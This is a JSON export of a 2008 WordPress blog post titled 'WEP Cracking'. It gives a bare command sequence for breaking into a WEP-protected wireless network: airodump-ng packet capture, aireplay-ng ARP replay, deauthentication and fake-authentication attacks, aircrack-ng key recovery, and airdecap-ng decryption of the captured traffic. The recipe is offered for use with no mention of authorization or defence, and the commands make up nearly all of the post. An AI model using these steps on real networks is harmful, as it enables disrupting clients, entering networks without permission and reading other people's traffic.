{"id":54,"date":"2008-11-07T03:52:00","date_gmt":"2008-11-07T08:52:00","guid":{"rendered":"http:\/\/www.rajatswarup.com\/blog\/?p=54"},"modified":"2010-02-10T23:38:52","modified_gmt":"2010-02-11T04:38:52","slug":"wep-cracking","status":"publish","type":"post","link":"https:\/\/www.rajatswarup.com\/blog\/2008\/11\/07\/wep-cracking\/","title":{"rendered":"WEP Cracking"},"content":{"rendered":"

If you want to crack WEP keys of an AP that is using WEP. <\/p>\n

The following steps should be performed:<\/p>\n

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE><\/span><\/span><\/p>\n

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE><\/span><\/span><\/p>\n

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE><\/span><\/p>\n

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE><\/span><\/p>\n

Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE><\/span><\/p>\n

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.<\/p>\n

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients<\/a>.<\/p>\n

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"

If you want to crack WEP keys of an AP that is using WEP. The following steps should be performed: Start Capturing packets first:sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE> Start capturing ARP packets:sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE> Send deauth packets:sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[259],"tags":[265,464,266,264],"class_list":["post-54","post","type-post","status-publish","format-standard","hentry","category-wireless","tag-cracking","tag-crypto","tag-hacking","tag-wep"],"_links":{"self":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/comments?post=54"}],"version-history":[{"count":2,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/54\/revisions"}],"predecessor-version":[{"id":119,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/54\/revisions\/119"}],"wp:attachment":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/media?parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/categories?post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/tags?post=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}